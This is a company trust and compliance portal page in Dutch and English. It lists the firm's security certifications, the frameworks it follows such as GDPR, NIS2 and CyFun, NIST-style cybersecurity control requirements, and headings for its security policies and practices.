Trust & Compliance Center
Welcome to the NormNest Trust & Compliance Center. This portal provides transparency into our security, privacy, and compliance practices.
Certifications
Completed Certifications
ISO27001:2022
ISO27001:2022
De ISO/IEC 27001:2022 is een internationale norm voor informatiebeveiliging. Ze specificeert eisen voor het opzetten, implementeren, onderhouden en continu verbeteren van een Information Security Management System (ISMS). Het doel is om organisaties te helpen hun informatie systematisch te beveiligen tegen risico’s zoals datalekken, cyberaanvallen of ongeautoriseerde toegang.
De versie 2022 is een geactualiseerde editie, met meer nadruk op risicobeheer, leiderschap, en continue verbetering, en sluit beter aan bij moderne dreigingen en technologieën.
KMO-Portefeuille (erkende dienstverlener)
KMO-Portefeuille (erkende dienstverlener)
De KMO-Portefeuille is een subsidiemaatregel van de Vlaamse overheid die kleine en middelgrote ondernemingen (KMO’s) financieel ondersteunt bij het volgen van opleidingen en het inwinnen van advies. Organisaties die erkend zijn als dienstverlener voor de KMO-Portefeuille voldoen aan specifieke kwaliteits- en administratieve vereisten en mogen via het platform diensten aanbieden aan Vlaamse ondernemingen.
Deze erkenning biedt klanten niet alleen financiële voordelen, maar ook vertrouwen in de deskundigheid en betrouwbaarheid van de dienstverlener.
Data Protection Officer
Data Protection Officer
De Data Protection Officer (DPO)-certificering bevestigt onze diepgaande kennis van de Algemene Verordening Gegevensbescherming (AVG/GDPR) en onze bekwaamheid om organisaties te ondersteunen bij het waarborgen van privacy- en gegevensbeschermingsnormen. Deze certificering onderstreept onze expertise in het adviseren over privacybeleid, het beoordelen van gegevensverwerkingsactiviteiten, het management van datalekken, en het fungeren als betrouwbaar contactpunt voor toezichthoudende autoriteiten.
ISO/IEC 27001 Lead auditor
ISO/IEC 27001 Lead auditor
Het bezit van het ISO/IEC 27001 Lead Auditor-certificaat bevestigt onze grondige kennis van informatiebeveiligingsnormen en onze bekwaamheid om formele audits uit te voeren op een Information Security Management System (ISMS). Deze certificering weerspiegelt onze deskundigheid in het beoordelen van risico’s, naleving, en de doeltreffendheid van beveiligingsmaatregelen binnen organisaties. Hierdoor kunnen wij ondersteuning bieden bij zowel interne evaluaties als voorbereidingen op externe certificaties, en dit in uiteenlopende sectoren waar informatiebeveiliging van cruciaal belang is.
NIS 2 Directive: Senior Lead Implementor
NIS 2 Directive: Senior Lead Implementor
Het NIS 2 Directive: Senior Lead Implementor-certificaat bevestigt onze diepgaande kennis van de vereisten en verantwoordelijkheden die voortvloeien uit de NIS2-richtlijn, gericht op de beveiliging van netwerk- en informatiesystemen binnen essentiële en belangrijke entiteiten. Deze certificering onderschrijft onze expertise in het opzetten, implementeren en optimaliseren van beheersmaatregelen op vlak van cybersecurity, risicobeheer, governance en incidentrespons. Ze stelt ons in staat organisaties te begeleiden bij het naleven van de NIS2-verplichtingen en bij het opbouwen van een weerbare en conforme digitale infrastructuur.
Compliances
GDPR
GDPR
De GDPR (General Data Protection Regulation) is een Europese wetgeving die de privacy en bescherming van persoonsgegevens van burgers binnen de EU regelt. Ze is sinds mei 2018 van kracht en verplicht organisaties om zorgvuldig om te gaan met persoonlijke gegevens, transparant te zijn over het gebruik ervan, en passende beveiligingsmaatregelen te nemen. De GDPR geeft individuen meer controle over hun data en legt bedrijven strenge verplichtingen op, met hoge boetes bij niet-naleving.
ISO/IEC 27001
ISO/IEC 27001
Internationale standaard voor informatiebeveiliging. Toont aan dat je als organisatie risico’s beheerst en je data adequaat beschermt.
NIS2 (EU)
NIS2 (EU)
Europese richtlijn die strengere eisen oplegt aan cybersecurity, vooral voor essentiële en belangrijke sectoren. Vanaf 2024 belangrijk voor veel bedrijven.
Cyber Fundamentals (CyFun)
Cyber Fundamentals (CyFun)
Vlaams/Nationaal raamwerk dat bedrijven helpt om hun cyberweerbaarheid op basisniveau op orde te brengen. Focus op identificeren, beschermen, detecteren, reageren en herstellen.
Cybersecurity Framework
Our cybersecurity approach is based on the NIST Cybersecurity Framework, which organizes cybersecurity activities into five core functions: Identify, Protect, Detect, Respond, and Recover.
IDENTIFY
BASIC_ID.AM-1.1: An inventory of assets associated with information and information processing facilities within the organization shall be documented, reviewed, and updated when changes occur.
IMPORTANT_ID.AM-1.2: The inventory of assets associated with information and information processing facilities shall reflect changes in the organization’s context and include all information necessary for effective accountability.
BASIC_ID.AM-2.1: An inventory that reflects what software platforms and applications are being used in the organization shall be documented, reviewed, and updated when changes occur.
IMPORTANT_ID.AM-2.3: Individuals who are responsible and who are accountable for administering software platforms and applications within the organization shall be identified.
IMPORTANT_ID.AM-2.4: When unauthorized software is detected, it shall be quarantined for possible exception handling, removed, or replaced, and the inventory shall be updated accordingly.
BASIC_ID.AM-3.1: Information that the organization stores and uses shall be identified.
IMPORTANT_ID.AM-3.2: All connections within the organization's ICT/OT environment, and to other organization-internal platforms shall be mapped, documented, approved, and updated as appropriate.
IMPORTANT_ID.AM-4.1: The organization shall map, document, authorize and when changes occur, update, all external services and the connections made with them.
BASIC_ID.AM-5.1: The organization’s resources (hardware, devices, data, time, personnel, information, and software) shall be prioritized based on their classification, criticality, and business value.
IMPORTANT_ID.AM-6.1: Information security and cybersecurity roles, responsibilities and authorities within the organization shall be documented, reviewed, authorized, and updated and alignment with organization-internal roles and external partners.
IMPORTANT_ID.BE-1.1: The organization’s role in the supply chain shall be identified, documented, and communicated.
IMPORTANT_ID.BE-5.1: To support cyber resilience and secure the delivery of critical services, the necessary requirements are identified, documented and their implementation tested and approved.
BASIC_ID.GV-1.1: Policies and procedures for information security and cyber security shall be created, documented, reviewed, approved, and updated when changes occur.
IMPORTANT_ID.GV-1.2: An organization-wide information security and cybersecurity policy shall be established, documented, updated when changes occur, disseminated, and approved by senior management.
BASIC_ID.GV-3.1: Legal and regulatory requirements regarding information/cybersecurity, including privacy obligations, shall be understood and implemented.
IMPORTANT_ID.GV-3.2: Legal and regulatory requirements regarding information/cybersecurity, including privacy obligations, shall be managed.
BASIC_ID.GV-4.1: As part of the company's overall risk management, a comprehensive strategy to manage information security and cybersecurity risks shall be developed and updated when changes occur.
IMPORTANT_ID.GV-4.2: Information security and cybersecurity risks shall be documented, formally approved, and updated when changes occur.
BASIC_ID.RA-1.1: Threats and vulnerabilities shall be identified.
IMPORTANT_ID.RA-1.2: A process shall be established to monitor, identify, and document vulnerabilities of the organisation's business critical systems in a continuous manner.
IMPORTANT_ID.RA-2.1: A threat and vulnerability awareness program that includes a cross-organization information-sharing capability shall be implemented.
BASIC_ID.RA-5.1: The organization shall conduct risk assessments in which risk is determined by threats, vulnerabilities and impact on business processes and assets.
IMPORTANT_ID.RA-5.2: The organization shall conduct and document risk assessments in which risk is determined by threats, vulnerabilities, impact on business processes and assets, and the likelihood of their occurrence.
IMPORTANT_ID.RA-6.1: A comprehensive strategy shall be developed and implemented to manage risks to the organization’s critical systems, that includes the identification and prioritization of risk responses.
IMPORTANT_ID.RM-2.1: The organization shall clearly determine it’s risk appetite.
IMPORTANT_ID.RM-3.1: The organization’s role in critical infrastructure and its sector shall determine the organization’s risk appetite.
IMPORTANT_ID.SC-2.1: The organization shall conduct cyber supply chain risk assessments at least annually or when a change to the organization’s critical systems, operational environment, or supply chain occurs; These assessments shall be documented, and the results disseminated to relevant stakeholders including those responsible for ICT/OT systems.
IMPORTANT_ID.SC-3.1: Based on the results of the cyber supply chain risk assessment, a contractual framework for suppliers and external partners shall be established to address sharing of sensitive information and distributed and interconnected ICT/OT products and services.
IMPORTANT_ID.SC-4.1: The organization shall review assessments of suppliers’ and third-party partner’s compliance with contractual obligations by routinely reviewing audits, test results, and other evaluations.
IMPORTANT_ID.SC-5.1: The organization shall identify and document key personnel from suppliers and third-party partners to include them as stakeholders in response and recovery planning activities.
IDENTIFY
Develop an organizational understanding to manage cybersecurity risk to systems, people, assets, data, and capabilities.
PROTECT
BASIC_PR.AC-1.1: Identities and credentials for authorized devices and users shall be managed.
IMPORTANT_PR.AC-1.2: Identities and credentials for authorized devices and users shall be managed, where feasible through automated mechanisms.
BASIC_PR.AC-2.1: Physical access to the facility, servers and network components shall be managed.
IMPORTANT_PR.AC-2.2: The management of physical access shall include measures related to access in emergency situations.
BASIC_PR.AC-3.1: The organisation's wireless access points shall be secured.
BASIC_PR.AC-3.2: The organization's networks when accessed remotely shall be secured, including through multi-factor authentication (MFA).
IMPORTANT_PR.AC-3.3: Usage restrictions, connection requirements, implementation guidance, and authorizations for remote access to the organization’s critical systems environment shall be identified, documented and implemented.
BASIC_PR.AC-4.1: Access permissions for users to the organization’s systems shall be defined and managed.
BASIC_PR.AC-4.2: It shall be identified who should have access to the organization's business's critical information and technology and the means to get access.
BASIC_PR.AC-4.3: Employee access to data and information shall be limited to the systems and specific information they need to do their jobs (the principle of Least Privilege).
BASIC_PR.AC-4.4: Nobody shall have administrator privileges for daily tasks.
IMPORTANT_PR.AC-4.5: Where feasible, automated mechanisms shall be implemented to support the management of user accounts on the organisation's critical systems, including disabling, monitoring, reporting and deleting user accounts.
IMPORTANT_PR.AC-4.6: Separation of duties (SoD) shall be ensured in the management of access rights.
IMPORTANT_PR.AC-4.7: Priviliged users shall be managed and monitored.
BASIC_PR.AC-5.1: Firewalls shall be installed and activated on all the organization's networks.
BASIC_PR.AC-5.2: Where appropriate, network integrity of the organization's critical systems shall be protected by incorporating network segmentation and segregation.
IMPORTANT_PR.AC-5.3: Where appropriate, network integrity of the organization's critical systems shall be protected by (1) Identifying, documenting, and controlling connections between system components. (2) Limiting external connections to the organization's critical systems.
IMPORTANT_PR.AC-5.4: The organization shall monitor and control connections and communications at the external boundary and at key internal boundaries within the organization's critical systems by implementing boundary protection devices where appropriate.
IMPORTANT_PR.AC-6.1: The organization shall implement documented procedures for verifying the identity of individuals before issuing credentials that provide access to organization's systems.
IMPORTANT_PR.AC-7.1: The organization shall perform a documented risk assessment on organization's critical system transactions and authenticate users, devices, and other assets (e.g., single-factor, multi-factor) commensurate with the risk of the transaction (e.g., individuals’ security and privacy risks and other organizational risks).
BASIC_PR.AT-1.1: Employees shall be trained as appropriate.
IMPORTANT_PR.AT-1.2: The organization shall incorporate insider threat recognition and reporting into security awareness training.
IMPORTANT_PR.AT-2.1: Privileged users shall be qualified before privileges are granted, and these users shall be able to demonstrate the understanding of their roles, responsibilities, and authorities.
IMPORTANT_PR.AT-3.1: The organization shall establish and enforce security requirements for business-critical third-party providers and users.
IMPORTANT_PR.AT-3.2: Third-party providers shall be required to notify any personnel transfers, termination, or transition involving personnel with physical or logical access to organization's business critical system's components.
IMPORTANT_PR.AT-3.3: The organization shall monitor business critical service providers and users for security compliance.
IMPORTANT_PR.AT-4.1: Senior executives shall demonstrate the understanding of their roles, responsibilities, and authorities.
IMPORTANT_PR.AT-5.1: The organization shall ensure that personnel responsible for the physical protection and security of the organization's critical systems and facilities are qualified through training before privileges are granted, and that they understand their responsibilities.
BASIC_PR.DS-3.1: Assets and media shall be disposed of safely.
IMPORTANT_PR.DS-3.2: The organization shall enforce accountability for all its business-critical assets throughout the system lifecycle, including removal, transfers, and disposition.
IMPORTANT_PR.DS-4.1: Capacity planning shall ensure adequate resources for organization's critical system information processing, networking, telecommunications, and data storage.
IMPORTANT_PR.DS-5.1: The organization shall take appropriate actions resulting in the monitoring of its critical systems at external borders and critical internal points when unauthorized access and activities, including data leakage, is detected.
IMPORTANT_PR.DS-6.1: The organization shall implement software, firmware, and information integrity checks to detect unauthorized changes to its critical system components during storage, transport, start-up and when determined necessary.
IMPORTANT_PR.IP-2.1: The system and application development life cycle shall include security considerations.
IMPORTANT_PR.IP-3.1: Changes shall be tested and validated before being implemented into operational systems.
BASIC_PR.IP-4.1: Backups for organization's business critical data shall be conducted and stored on a system different from the device on which the original data resides
IMPORTANT_PR.IP-4.2: The reliability and integrity of backups shall be verified and tested on regular basis.
IMPORTANT_PR.IP-4.3: A separate alternate storage site for system backups shall be operated and the same security safeguards as the primary storage location shall be employed.
IMPORTANT_PR.IP-5.1: The organization shall define, implement, and enforce policy and procedures regarding emergency and safety systems, fire protection systems, and environment controls for its critical systems.
IMPORTANT_PR.IP-6.1: The organization shall ensure that its critical system's data is destroyed according to policy.
IMPORTANT_PR.IP-7.1: The organization shall incorporate improvements derived from the monitoring, measurements, assessments, and lessons learned into protection process updates (continuous improvement).
IMPORTANT_PR.IP-8.1: The organization shall collaborate and share information about its critical system's related security incidents and mitigation measures with designated partners.
IMPORTANT_PR.IP-8.2: Communication of effectiveness of protection technologies shall be shared with appropriate parties.
IMPORTANT_PR.IP-9.1: Incident response plans (Incident Response and Business Continuity) and recovery plans (Incident Recovery and Disaster Recovery) shall be established, maintained, approved, and tested to determine the effectiveness of the plans, and the readiness to execute the plans.
BASIC_PR.IP-11.1: Personnel having access to the organization’s most critical information or technology shall be verified.
IMPORTANT_PR.IP-11.2: Develop and maintain a human resource information/cyber security process that is applicable when recruiting, during employment and at termination of employment.
IMPORTANT_PR.IP-12.1: The organization shall establish and maintain a documented process that allows continuous review of vulnerabilities and strategies to mitigate them.
BASIC_PR.MA-1.1: Patches and security updates for Operating Systems and critical system components shall be installed.
IMPORTANT_PR.MA-1.2: The organization shall plan, perform and document preventive maintenance and repairs on its critical system components according to approved processes and tools.
IMPORTANT_PR.MA-1.3: The organization shall enforce approval requirements, control, and monitoring of maintenance tools for use on the its critical systems.
IMPORTANT_PR.MA-1.4: The organization shall verify security controls following hardware maintenance or repairs, and take action as appropriate.
BASIC_PR.PT-1.1: Logs shall be maintained, documented, and reviewed.
IMPORTANT_PR.PT-1.2: The organization shall ensure that the log records include an authoritative time source or internal clock time stamp that are compared and synchronized to an authoritative time source.
IMPORTANT_PR.PT-2.1: The usage restriction of portable storage devices shall be ensured through an appropriate documented policy and supporting safeguards.
IMPORTANT_PR.PT-2.2: The organisation should technically prohibit the connection of removable media unless strictly necessary; in other instances, the execution of autoruns from such media should be disabled.
IMPORTANT_PR.PT-3.1: The organization shall configure the business critical systems to provide only essential capabilities.
BASIC_PR.PT-4.1: Web and e-mail filters shall be installed and used.
PROTECT
Develop and implement appropriate safeguards to ensure delivery of critical infrastructure services.
DETECT
IMPORTANT_DE.AE-2.1: The organization shall review and analyze detected events to understand attack targets and methods.
BASIC_DE.AE-3.1: The activity logging functionality of protection / detection hardware or software (e.g. firewalls, anti-virus) shall be enabled, backed-up and reviewed.
IMPORTANT_DE.AE-5.1: The organization shall implement automated mechanisms and system generated alerts to support event detection and to assist in the identification of security alert thresholds.
BASIC_DE.CM-1.1: Firewalls shall be installed and operated on the network boundaries and completed with firewall protection on the endpoints.
IMPORTANT_DE.CM-1.2: The organization shall monitor and identify unauthorized use of its business critical systems through the detection of unauthorized local connections, network connections and remote connections.
IMPORTANT_DE.CM-2.1: The physical environment of the facility shall be monitored for potential information/cybersecurity events.
BASIC_DE.CM-3.1: End point and network protection tools to monitor end-user behavior for dangerous activity shall be implemented.
IMPORTANT_DE.CM-3.2: End point and network protection tools that monitor end-user behavior for dangerous activity shall be managed.
BASIC_DE.CM-4.1: Anti-virus, -spyware, and other -malware programs shall be installed and updated.
IMPORTANT_DE.CM-5.1: The organization shall define acceptable and unacceptable mobile code and mobile code technologies; and authorize, monitor, and control the use of mobile code within the system.
IMPORTANT_DE.CM-6.1: All external connections by vendors supporting IT/OT applications or infrastructure shall be secured and actively monitored to ensure that only permissible actions occur during the connection.
IMPORTANT_DE.CM-6.2: External service providers' conformance with personnel security policies and procedures and contract security requirements shall be monitored relative to their cybersecurity risks.
IMPORTANT_DE.CM-7.1: The organization's business critical systems shall be monitored for unauthorized personnel access, connections, devices, access points, and software.
IMPORTANT_DE.CM-8.1: The organization shall monitor and scan for vulnerabilities in its critical systems and hosted applications ensuring that system functions are not adversely impacted by the scanning process.
IMPORTANT_DE.CM-8.2: The vulnerability scanning process shall include analysis, remediation, and information sharing.
IMPORTANT_DE.DP-2.1: The organization shall conduct detection activities in accordance with applicable federal and regional laws, industry regulations and standards, policies, and other applicable requirements.
IMPORTANT_DE.DP-4.1: The organization shall communicate event detection information to predefined parties.
IMPORTANT_DE.DP-5.1: Improvements derived from the monitoring, measurement, assessment, testing, review, and lessons learned, shall be incorporated into detection process revisions.
DETECT
Develop and implement appropriate activities to identify the occurrence of a cybersecurity event.
RESPOND
BASIC_RS.RP-1.1: An incident response process, including roles, responsibilities, and authorities, shall be executed during or after an information/cybersecurity event on the organization's critical systems.
IMPORTANT_RS.CO-1.1: The organization shall ensure that personnel understand their roles, objectives, restoration priorities, task sequences (order of operations) and assignment responsibilities for event response.
IMPORTANT_RS.CO-2.1: The organization shall implement reporting on information/cybersecurity incidents on its critical systems in an organization-defined time frame to organization-defined personnel or roles.
IMPORTANT_RS.CO-3.2: The organization shall share information/cybersecurity incident information with relevant stakeholders as foreseen in the incident response plan.
IMPORTANT_RS.CO-5.1: The organization shall share information/cybersecurity event information voluntarily, as appropriate, with external stakeholders, industry security groups,… to achieve broader information/cybersecurity situational awareness.
IMPORTANT_RS.AN-1.1: The organization shall investigate information/cybersecurity-related notifications generated from detection systems.
IMPORTANT_RS.AN-2.1: Thorough investigation and result analysis shall be the base for understanding the full implication of the information/cybersecurity incident.
IMPORTANT_RS.AN-4.1: Information/cybersecurity incidents shall be categorized according to the level of severity and impact consistent with the evaluation criteria included the incident response plan.
IMPORTANT_RS.AN-5.1: The organization shall implement vulnerability management processes and procedures that include processing, analyzing and remedying vulnerabilities from internal and external sources.
BASIC_RS.IM-1.1: The organization shall conduct post-incident evaluations to analyse lessons learned from incident response and recovery, and consequently improve processes / procedures / technologies to enhance its cyber resilience.
IMPORTANT_RS.IM-1.2: Lessons learned from incident handling shall be translated into updated or new incident handling procedures that shall be tested, approved and trained.
IMPORTANT_RS.IM-2.1: The organization shall update the response and recovery plans to address changes in its context.
RESPOND
Develop and implement appropriate activities to take action regarding a detected cybersecurity incident.
RECOVER
BASIC_RC.RP-1.1: A recovery process for disasters and information/cybersecurity incidents shall be developed and executed as appropriate.
IMPORTANT_RC.IM-1.1: The organization shall incorporate lessons learned from incident recovery activities into updated or new system recovery procedures and, after testing, frame this with appropriate training.
RECOVER
Develop and implement appropriate activities to maintain plans for resilience and to restore capabilities impaired by cybersecurity incidents.
Trust Policies
Risicoprofiel
Hersteltijddoelstelling
Afhankelijkheid van Derden
Hosting
Risicoprofiel
Bepaalt de veerkracht van je systeem en het belang van je dienst voor klanten. Bevat hersteldoelen, datasensitiviteit en afhankelijkheid van derden.
Productbeveiliging
Audit Logging
Data Beveiliging
Integraties
Multi-Factor Authenticatie
Passkey Ondersteuning
Role-Based Access Control
Service-Level Agreement
SSO
Team Management
Productbeveiliging
Bevat technische en organisatorische maatregelen om je product te beveiligen, toegang te controleren en gebruikersrollen te beheren.
Rapporten
Vulnerability Assessment Report
Rapporten
Verwijst naar technische en compliance-documentatie die je kunt aanleveren om je beveiligingsniveau en infrastructuur aan te tonen.
Gegevensbeveiliging
Access Monitoring
Data Backups
Data Erasure
Encryption-at-rest
Encryption-in-transit
Media Protection
Physical Media Disposal
Physical Security
Gegevensbeveiliging
Deze sectie beschrijft hoe uw organisatie gegevens beschermt gedurende de hele levenscyclus. Deze maatregelen demonstreren uw toewijding aan het beschermen van klantinformatie door middel van technische controles, beleid en procedures voor gegevensverwerking.
Applicatiebeveiliging
Responsible Disclosure
Application Penetration Testing
Applicatiebeveiliging
Deze categorie detailleert hoe beveiliging is geïntegreerd in uw applicatieontwikkeling en onderhoudsprocessen. Deze praktijken tonen aan hoe u beveiligingskwetsbaarheden in uw softwareontwikkelingslevenscyclus voorkomt, identificeert en aanpakt.
Juridisch
Cyber Insurance
Data Processing Agreement
Data Subject Requests
Master Services Agreement
Privacy Policy
Service-Level Agreement
Terms of Service
Juridisch
Deze sectie biedt toegang tot contractuele overeenkomsten en juridische documentatie die uw relatie met klanten definiëren. Deze documenten formaliseren beveiligingstoezeggingen, gegevensverwerkingspraktijken en compliance-verplichtingen.
Gegevensprivacy
Cookies
Data Breach Notifications
Gegevensprivacy
Deze categorie schetst hoe uw organisatie persoonlijke gegevens beheert en privacy-rechten respecteert. Deze praktijken tonen uw toewijding aan naleving van gegevensprivacy en ethische gegevensverwerking.
Toegangscontrole
Access Log Management
Automated Account Management
Bring Your Own Device (BYOD)
Data Access
Internal Single-Sign-On (SSO)
Least Privilege
Logging
Mobile Device Access
Password Manager
Password Security
Remote Access
Separation of Duties
System Use Notification
User Access Review
Virtual Private Network (VPN)
Wireless Access
Toegangscontrole
Deze sectie detailleert hoe uw organisatie toegang tot systemen en gegevens beheert en beperkt. Deze controles voorkomen ongeautoriseerde toegang terwijl ze ervoor zorgen dat legitieme gebruikers hun vereiste functies efficiënt kunnen uitvoeren.
Infrastructuur
Statusmonitoring
Network Time Protocol
Tijdsynchronisatie
Infrastructuur
Deze categorie omvat alle componenten van uw technische infrastructuur, waaronder cloud-diensten, datacenters en netwerkconfiguraties. Deze elementen vormen de technische basis waarop uw SaaS-oplossing draait en tonen aan hoe u betrouwbaarheid, schaalbaarheid en veiligheid op infrastructuurniveau waarborgt.
Eindpuntbeveiliging (Endpoint Security)
Anti-Malware
Schijfversleuteling
DNS-filtering
Eindpuntdetectie & -respons
Host Indringpreventiesysteem (Host Intrusion Prevention System - HIPS)
Beheer van Draagbare Opslag
Eindpuntbeveiliging (Endpoint Security)
Deze categorie behandelt hoe u eindapparaten zoals computers, laptops en mobiele apparaten beveiligt die toegang hebben tot uw systemen. Deze beveiligingsmaatregelen tonen aan hoe u bedreigingen voorkomt en detecteert op het niveau van individuele apparaten, waardoor een cruciale verdedigingslinie wordt geboden tegen kwaadwillenden.
Netwerkbeveiliging
Gegevensverliespreventie
Firewall
Netwerk Penetratietesten
Verkeersfiltering
Web Application Firewall
Draadloze Beveiliging
Netwerkbeveiliging
Deze sectie beschrijft hoe uw organisatie de communicatie binnen en naar uw netwerken beveiligt. Deze maatregelen demonstreren uw aanpak om netwerkverkeer te monitoren, te filteren en te beschermen tegen indringers en gegevensexfiltratie.
Bedrijfsbeveiliging (Corporate Security)
E-mailbescherming
Personeelshandboek
Medewerkerstraining
Incidentrespons
Interne Beoordelingen
Penetratietesten
Personeelsbeëindiging/Overplaatsing
Security Operations Center
Programma voor Extern Personeel
Bedrijfsbeveiliging (Corporate Security)
Deze categorie omvat beveiligingspraktijken op organisatieniveau, waaronder personeelsbeleid, training en incidentrespons. Deze maatregelen tonen aan hoe de menselijke en organisatorische aspecten van beveiliging worden beheerd om een algehele beveiligingscultuur te creëren.
Beleidsregels (Policies)
Acceptabel Gebruiksbeleid (Acceptable Use Policy)
Toegangscontrolebeleid
Anti-Malware Beleid
Activabeheerbeleid (Asset Management Policy)
Bewustzijn- en Trainingbeleid (Awareness and Training Policy)
Back-upbeleid
Bring Your Own Device (BYOD) Beleid
Bedrijfscontinuïteit/Herstel na Ramp Beleid (Business Continuity/Disaster Recovery Policy)
Configuratiebeheerbeleid (Configuration Management Policy)
Beleidsregels (Policies)
Deze sectie bevat de formele beleidsregels die uw beveiligingspraktijken sturen en reguleren. Deze documenten demonstreren uw systematische aanpak van beveiligingsbeheer en vormen het fundament voor consistente en effectieve beveiligingsmaatregelen binnen uw organisatie.
Incidentrespons (Incident Response)
Incidentmeldingsproces (Incident Reporting Process)
Incidentrespons (Incident Response)
Deze categorie beschrijft hoe uw organisatie zich voorbereidt op, reageert op en herstelt van beveiligingsincidenten. Deze processen tonen uw vermogen aan om effectief om te gaan met beveiligingsgebeurtenissen en de impact ervan op klanten en bedrijfsactiviteiten te minimaliseren.
Risicobeheer (Risk Management)
Risicobeoordelingen (Risk Assessments)
Beheer van Toeleveringsketen Risico's (Supply Chain Risk Management)
Afhankelijkheid van Derden (Third-Party Dependence)
Risicobeheer (Risk Management)
Deze sectie schetst hoe uw organisatie beveiligingsrisico's identificeert, beoordeelt en beheert. Deze praktijken demonstreren uw systematische aanpak om risico's te begrijpen en geschikte beveiligingsmaatregelen te implementeren op basis van het dreigingslandschap.
Activabeheer (Asset Management)
Activaclassificatie (Asset Classification)
Activainventarissen (Hardware/Software) (Asset Inventories)
Activatracering (Asset Tracking)
IT Activabeheer (ITAM) Programma (IT Asset Management Program)
Veilige Activaverwijdering (Secure Asset Disposal)
Activabeheer (Asset Management)
Deze categorie detailleert hoe uw organisatie hardware- en software-activa bijhoudt, classificeert en beheert. Deze processen tonen aan hoe u de volledige levenscyclus van bedrijfsmiddelen bewaakt om beveiligingsrisico's te beheersen en compliance te waarborgen.
Bedrijfscontinuïteit/Herstel na Ramp (BC/DR)
Alternatieve Verwerkings-/Opslaglocatie (Alternate Processing/Storage Site)
Bedrijfscontinuïteitsmanagementsysteem (BCMS) (Business Continuity Management System)
Bedrijfscontinuïteitsplan (BCP) (Business Continuity Plan)
Noodplantesten/Geleerde Lessen (Contingency Plan Testing/Lessons Learned)
Continuïteitstraining/Simulaties (Contingency Training/Simulations)
Continuïteits-/Nood Operatieplan (Continuity/Contingency of Operations Plan)
Gegevensback-up/Back-upbescherming (Data Backup/Backup Protection)
Disaster Recovery Plan (DRP) (Disaster Recovery Plan)
Tabletop Oefeningen (Tabletop Exercises)
Bedrijfscontinuïteit/Herstel na Ramp (BC/DR)
Deze sectie beschrijft hoe uw organisatie zich voorbereidt op en herstelt van ernstige verstoringen. Deze plannen en procedures demonstreren uw vermogen om kritieke bedrijfsfuncties te handhaven of snel te herstellen bij calamiteiten, waardoor de impact op klanten wordt geminimaliseerd.
Training
Phishing Training
Rolgebaseerde Training (Role-Based Training)
Security Awareness Training
Trainingsprogramma
Training
Deze categorie beschrijft de beveiligingstraining en bewustwordingsprogramma's voor uw medewerkers. Deze initiatieven tonen aan hoe u een sterke beveiligingscultuur opbouwt en ervoor zorgt dat personeel over de kennis beschikt om veilig te handelen en beveiligingsrisico's te herkennen.
Wijzigingsbeheer (Change Management)
Configuratiebeheerprogramma (Configuration Management Program)
Impactanalyse (Impact Analysis)
Wijzigingsbeheer (Change Management)
Deze sectie beschrijft hoe uw organisatie veranderingen in IT-systemen en -processen beheert. Deze procedures demonstreren uw gecontroleerde aanpak voor het implementeren van veranderingen, waardoor het risico op beveiligingsproblemen als gevolg van wijzigingen wordt verminderd.
Fysieke & Omgevingsbeveiliging (Physical & Environment)
Toegangsmonitoring (Access Monitoring)
Alarmen & Bewaking (Alarms & Surveillance)
Alternatieve Werklocaties (Alternate Work Sites)
Noodstroom & -verlichting (Emergency Power & Lighting)
Brandbescherming (Fire Protection)
Fysieke Toegangsbeveiliging (Physical Access Security)
Stroomapparatuur & Bekabeling (Power Equipment & Cabling)
Telewerken op Afstand (Remote Telework)
Bezoekerscontrole (Visitor Control)
Fysieke & Omgevingsbeveiliging (Physical & Environment)
Deze categorie omvat maatregelen voor de beveiliging van fysieke faciliteiten en omgevingen waar uw systemen zich bevinden. Deze controles tonen aan hoe u ongeautoriseerde fysieke toegang voorkomt en bescherming biedt tegen omgevingsrisico's zoals brand of stroomuitval.
Continue Monitoring (Continuous Monitoring)
Gegevensverliespreventiesysteem (DLP) (Data Loss Prevention System)
Event & Auditlogbeheer
Beoordelingen & Updates (Reviews & Updates)
Continue Monitoring (Continuous Monitoring)
Deze sectie beschrijft hoe uw organisatie doorlopend systemen en netwerken bewaakt op beveiligingsgebeurtenissen. Deze processen demonstreren uw vermogen om bedreigingen en kwetsbaarheden tijdig te detecteren en erop te reageren door constante waakzaamheid.